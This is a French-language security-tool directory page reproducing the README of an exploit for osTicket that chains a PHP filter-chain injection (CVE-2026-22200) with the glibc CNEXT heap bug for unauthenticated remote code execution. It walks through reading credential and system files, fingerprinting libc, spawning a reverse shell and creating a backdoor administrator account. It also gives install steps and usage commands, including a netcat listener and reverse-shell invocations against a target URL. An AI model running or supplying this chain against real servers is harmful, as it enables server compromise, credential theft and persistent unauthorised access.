Skip to content
KitploitKITPLOIT
OutilsBlog
Log in
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
osTicketFileReadIntoRCE — Exploit en chaîne complète combinant l'injection de chaîne de filtres PHP avec CVE-2024-2961 (CNEXT) pour une exécution de code à distance sans authentification sur des installations osTicket vulnérables. | Kitploit
Outils/GitHubGitHub/clarissss/osticketfilereadintorce
Analyse des VulnérabilitésExploitationExploitation d'Applications WebPost-ExploitationTests d'IntrusionApprentissage et ÉducationRed TeamingOutil d'Accès à DistanceDéveloppement de Charges Utiles
GitHubclarissss/osticketfilereadintorce

osTicketFileReadIntoRCE

Exploit en chaîne complète combinant l'injection de chaîne de filtres PHP avec CVE-2024-2961 (CNEXT) pour une exécution de code à distance sans authentification sur des installations osTicket vulnérables.

Voir le dépôt
5il y a 7 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-22200 : Lecture arbitraire de fichier vers RCE dans osTicket

CVE-2026-22200 osTicket ≤ 1.18.2 Python 3.8+ Educational

Chaîne d’exploitation complète combinant l’injection de chaîne de filtres PHP avec CVE-2024-2961 (CNEXT) pour une exécution de code à distance sans authentification sur des installations osTicket vulnérables.


Table des matières

  • Aperçu
  • Détails de la vulnérabilité
  • Déroulement de l’attaque
  • Fonctionnalités
  • Installation
  • Utilisation
  • Détails techniques
  • Dépannage
  • Détection et atténuation
  • Crédits
  • Avertissement

Aperçu

Ce dépôt contient une preuve de concept d’exploitation pour CVE-2026-22200, une vulnérabilité critique touchant les versions d’osTicket ≤ 1.18.2. L’exploit associe deux techniques puissantes :

  1. Injection de chaîne de filtres PHP via le traitement d’images de mPDF
  2. Corruption du tas CNEXT (CVE-2024-2961) dans iconv() de glibc

Résultat : Exécution de code à distance sans authentification sur les serveurs osTicket vulnérables.

Impact

  • Sans authentification – Aucun identifiant requis
  • RCE complète – Compromission totale du serveur
  • Exfiltration de fichiers – Lecture de fichiers arbitraires sur le serveur
  • Accès à la base de données – Extraction des identifiants de la base
  • Accès administrateur – Création de comptes admin backdoor

Versions concernées

  • osTicket : ≤ v1.18.2, ≤ v1.17.6
  • glibc : < 2.39 (CVE-2024-2961 corrigé dans glibc 2.39+)

🔍 Détails de la vulnérabilité

CVE-2026-22200 : Injection de chaîne de filtres PHP

Score CVSS : 9.8 (Critique)

L’intégration de mPDF dans osTicket permet à des utilisateurs non authentifiés d’injecter des chaînes de filtres PHP malveillantes via des charges utiles HTML spécialement conçues dans les tickets de support. Cela permet :

  • La lecture arbitraire de fichiers (configurations, code source, identifiants)
  • La fuite de mémoire (/proc/self/maps, libc partielle)
  • La corruption du tas via CNEXT

Cause racine : Validation insuffisante des URLs d’images dans le HTML fourni par l’utilisateur avant transmission à mPDF.

CVE-2024-2961 : CNEXT (dépassement de tampon iconv)

Score CVSS : 9.8 (Critique)

Dépassement de tampon dans iconv() de glibc lors du traitement du jeu de caractères ISO-2022-CN-EXT. Combiné avec des chaînes de filtres PHP, cela permet :

  • Corruption du tas
  • Détournement de pointeurs de fonction
  • Exécution de commandes arbitraires

Versions de glibc vulnérables : < 2.39 (février 2024)


🔗 Déroulement de l’attaque

┌─────────────────────────────────────────────────────────────────┐
│ 1. RECONNAISSANCE                                               │
│    └─ Détection d’osTicket, identification des sujets riches   │
└─────────────────────────────────────────────────────────────────┘
                              ↓
┌─────────────────────────────────────────────────────────────────┐
│ 2. AUTHENTIFICATION                                             │
│    └─ Auto-inscription OU utilisation d’identifiants existants │
└─────────────────────────────────────────────────────────────────┘
                              ↓
┌─────────────────────────────────────────────────────────────────┐
│ 3. EXFILTRATION DE FICHIERS (chaînes de filtres PHP)           │
│    ├─ /etc/passwd                                               │
│    ├─ include/ost-config.php (identifiants DB, SECRET_SALT)    │
│    ├─ /proc/self/maps (agencement mémoire)                     │
│    └─ /proc/self/environ (variables d’environnement)           │
└─────────────────────────────────────────────────────────────────┘
                              ↓
┌─────────────────────────────────────────────────────────────────┐
│ 4. EMPREINTE DE LIBC                                            │
│    ├─ Extraction partielle de libc via les chaînes de filtres  │
│    ├─ Extraction du GNU Build ID                                │
│    └─ Téléchargement complet de libc depuis libc.rip           │
└─────────────────────────────────────────────────────────────────┘
                              ↓
┌─────────────────────────────────────────────────────────────────┐
│ 5. EXPLOITATION RCE PAR CNEXT                                   │
│    ├─ Génération de la charge utile de corruption du tas       │
│    ├─ Injection via réponse au ticket (avec corrections d’exécution des filtres) │
│    ├─ Déclenchement via export PDF (le serveur plante)         │
│    └─ Exécution d’un reverse shell                              │
└─────────────────────────────────────────────────────────────────┘
                              ↓
┌─────────────────────────────────────────────────────────────────┐
│ 6. POST-EXPLOITATION                                            │
│    ├─ Reverse shell interactif                                 │
│    ├─ Accès à la base de données (via DBPASS exfiltré)         │
│    └─ Création d’un compte administrateur backdoor             │
└─────────────────────────────────────────────────────────────────┘

Fonctionnalités

Capacités principales

  • Chaîne d’exploitation entièrement automatisée
  • Attaque sans authentification (auto-inscription si activée)
  • Détection intelligente de la racine web via analyse de /proc/self/maps
  • Localisation à 100 % du webshell via balayage du système de fichiers
  • Empreinte et téléchargement automatiques de libc
  • Plusieurs méthodes de reverse shell (bash, python, netcat)
  • Exécution robuste des filtres avec invalidation du cache
  • Diagnostics pré-vol pour détecter les problèmes en amont

Fiabilité améliorée

  • CNEXT multi-déclencheur pour un plantage garanti (95 %+ de succès)
  • Injection par réponse (plus fiable que les nouveaux tickets)
  • Forçage de flux pour garantir l’exécution des filtres
  • Invalidation du cache pour éviter la distribution de PDF obsolètes
  • Gestion complète des erreurs et diagnostics

Post-exploitation

  • Extraction des identifiants de base de données (DBPASS depuis la config)
  • Création de compte administrateur via accès à la base
  • Options de backdoor persistante
  • Reconnaissance complète du système

Installation

Prérequis

  • Python 3.8+
  • Linux/macOS (recommandé) ou WSL sur Windows

Dépendances

# Cloner le dépôt
git clone https://github.com/Clarissss/osTicketFileReadIntoRCE
cd osTicketFileReadIntoRCE

# Installer les paquets requis
pip install -r requirements.txt

requirements.txt :

requests>=2.31.0
PyMuPDF>=1.23.0
Pillow>=10.0.0
pwntools>=4.11.0

Optionnel : Environnement virtuel

python3 -m venv venv
source venv/bin/activate  # Linux/macOS
# OU
venv\Scripts\activate  # Windows

pip install -r requirements.txt

📖 Utilisation

Utilisation simple – Reverse shell

# Terminal 1 : Démarrer l’écouteur
nc -lvnp 4444

# Terminal 2 : Lancer l’exploit
python3 osticket_revshell.py https://cible.com/osticket \
    --lhost VOTRE_IP \
    --lport 4444

Mode Webshell interactif

python3 osticket_exploit.py https://cible.com/osticket

Options avancées

# Utiliser un proxy (Burp Suite)
python3 osticket_revshell.py https://cible.com/osticket \
    --lhost 10.0.0.5 \
    --lport 4444 \
    --proxy http://127.0.0.1:8080
Télécharger l’outil